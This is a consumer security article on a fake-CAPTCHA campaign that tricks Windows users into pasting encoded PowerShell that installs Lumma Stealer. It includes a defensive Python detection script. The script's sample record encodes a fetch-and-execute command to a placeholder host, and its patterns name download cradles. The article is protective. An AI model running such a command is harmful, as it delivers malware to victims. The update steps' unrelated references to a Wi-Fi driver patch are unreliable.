Windows users are being tricked by sneaky malware scheme – CyberGuy

Hackers keep refining their tactics against Windows users, both exploiting known vulnerabilities and tricking people into installing malware themselves. Security researchers have recently uncovered a new campaign that spreads malware through fake human-verification pages. These phishing sites, hosted on a variety of platforms and served through Content Delivery Networks (CDNs), mislead visitors with a counterfeit Google CAPTCHA interface, and that façade is used to covertly install the information-stealing malware known as Lumma Stealer.

What you need to know

Researchers from Cloudsek have shed light on this innovative method employed by hackers to disseminate Lumma Stealer. Initially reported by Palo Alto Networks’ Unit 42, these fraudulent pages serve as a vehicle for malware distribution. Paul Michaud II, a threat hunter at Unit 42, elaborated on the mechanics of this scheme: “These pages have a button that, when clicked, shows instructions for victims to paste a PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware.”

Cloudsek’s latest investigation has identified a growing number of malicious sites spreading Lumma Stealer. The process is deceptively simple: when a user clicks the “I’m not a robot” button on one of these counterfeit verification pages, a PowerShell command is silently copied to the clipboard. If the user then pastes it into the Run dialog box, it launches PowerShell in a hidden window and executes a Base64-encoded command.

This command fetches further instructions from a remote server, leading to the download of Lumma Stealer malware. The downloaded file, labeled “dengo.zip,” must be unzipped and executed on a Windows machine for Lumma Stealer to become operational, establishing connections to domains controlled by the attackers. Notably, the malware delivered via this method can be easily replaced with other malicious files, showcasing the adaptability of these cybercriminals.
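The chain described above leaves a recognisable footprint in process-creation telemetry: explorer.exe (the Run dialog’s parent) spawning PowerShell with a hidden window and an encoded command whose decoded payload pulls content from a remote host. The script below is an added illustration of how a defender might triage such records; it is not code from Cloudsek, Unit 42 or the campaign itself. The “key=value|key=value” record layout, the placeholder host stage.example.invalid and all three sample events are constructed assumptions standing in for a real Sysmon or EDR export.

```python
"""Triage process-creation records for the fake-CAPTCHA / Run-dialog pattern:
explorer.exe spawning PowerShell with a hidden window and a Base64-encoded
command that fetches and runs remote content."""
from __future__ import annotations

import base64
import binascii
import re

# PowerShell accepts abbreviated switches, so match the common spellings.
ENCODED_FLAG = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden", re.I)
# Cmdlets and .NET calls typically used to pull a second stage and run it.
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|DownloadString|"
    r"DownloadFile|WebClient|Invoke-Expression|\biex\b", re.I)


def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects: Base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real telemetry). The "key=value|..." layout is
# an assumption standing in for whatever your Sysmon/EDR export produces.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    # Pasted into the Run dialog: explorer.exe launches a hidden, encoded PowerShell
    # whose payload fetches more instructions from a placeholder remote host.
    "ParentImage=C:\\Windows\\explorer.exe|Image=" + PS
    + "|CommandLine=powershell.exe -w hidden -enc "
    + encode_ps("Invoke-RestMethod http://stage.example.invalid/c | Invoke-Expression"),
    # Ordinary admin script run from a console: no hidden window, no encoding.
    "ParentImage=C:\\Windows\\System32\\cmd.exe|Image=" + PS
    + "|CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # Scheduled task using -enc for a harmless one-liner: encoded, but nothing else.
    "ParentImage=C:\\Windows\\System32\\svchost.exe|Image=" + PS
    + "|CommandLine=powershell.exe -NoProfile -enc " + encode_ps("Get-Date"),
]


def parse_event(line: str) -> dict[str, str]:
    """Split one 'key=value|key=value' record into a dict."""
    fields: dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_event(event: dict[str, str]) -> tuple[int, list[str]]:
    """Score a PowerShell launch; higher means closer to the paste-and-run pattern."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    score, reasons = 0, []
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        score += 2
        reasons.append("parent is explorer.exe (Run dialog or shell launch)")
    cmdline = event.get("CommandLine", "")
    if HIDDEN_WINDOW.search(cmdline):
        score += 2
        reasons.append("hidden window requested")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 1
        reasons.append("encoded command present")
        if DOWNLOAD_CRADLE.search(decoded):
            score += 3
            reasons.append("decoded payload fetches and executes remote content")
    return score, reasons


def triage(lines: list[str], threshold: int = 5) -> list[tuple[int, int, list[str]]]:
    """Return (record_index, score, reasons) for records at or above the threshold."""
    hits = []
    for idx, line in enumerate(lines):
        score, reasons = score_event(parse_event(line))
        if score >= threshold:
            hits.append((idx, score, reasons))
    return hits


if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"record {idx}: score {score}")
        for reason in reasons:
            print("  -", reason)
```

Only the first constructed record crosses the threshold: it combines the explorer.exe parent, the hidden window, the encoded command and a decoded download cradle, whereas the scheduled task that merely uses -enc scores too low to alert on by itself. Decoding the payload is the step that turns a noisy “encoded PowerShell” rule into a usable one, since -EncodedCommand is common in legitimate automation.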

Updating your PC is the best course of action

To safeguard against known vulnerabilities, it is crucial to keep your Windows system, browsers, and antivirus software consistently updated. Software updates frequently include patches addressing security weaknesses that hackers exploit. By maintaining current versions of your operating system, browsers, and applications, you effectively close potential entry points for malware.

To update your Windows software and ensure you benefit from the latest security enhancements, follow these straightforward steps:

For Windows 10 and Windows 11

  • Click on the Start menu and select “Settings” (or press the Windows key + I shortcut).
  • In the Settings window, click on “Update & Security.”
  • Under the “Windows Update” section, click on “Check for updates.”
  • If updates are available, including the patch for the Wi-Fi driver vulnerability, Windows will download and install them automatically.
  • Once the installation is complete, you may be prompted to restart your computer to apply the updates.

For Windows 8.1 and Earlier Versions

  • Open the Control Panel and navigate to “System and Security.”
  • Under the “Windows Update” section, click on “Check for updates.”
  • If updates are available, including the patch for the Wi-Fi driver vulnerability, select them and click “Install updates.”
  • Follow the on-screen instructions to complete the installation process.
  • Restart your computer if prompted to apply the updates.

5 more ways to protect yourself from Lumma malware

1) Use strong antivirus software: A robust antivirus solution can help detect and thwart threats like Lumma Stealer before they inflict damage. Exercise caution by avoiding clicks on suspicious or unfamiliar links, particularly those from emails or websites requesting human verification. My top recommendation is TotalAV, which is currently offering a limited-time deal for CyberGuy readers: for your first year (80% off) for the TotalAV Antivirus Pro package.

2) Check CAPTCHA pages: Authentic Google CAPTCHA pages will never prompt you to download files or paste commands. If anything seems amiss, it’s best to exit the page.

3) Avoid running unexpected commands: Refrain from pasting or executing commands (such as PowerShell scripts) that you do not fully understand or that were copied from dubious websites. Cybercriminals often deceive users into unwittingly executing malware this way.

4) Keep your software updated: Regularly updating your operating system, browsers, and all software applications is essential. Updates frequently contain patches for security vulnerabilities that malware can exploit.

5) Use two-factor authentication (2FA): Activate 2FA on all your accounts. This additional layer of security requires a second form of verification, making it more challenging for attackers to gain access even if they possess your password.
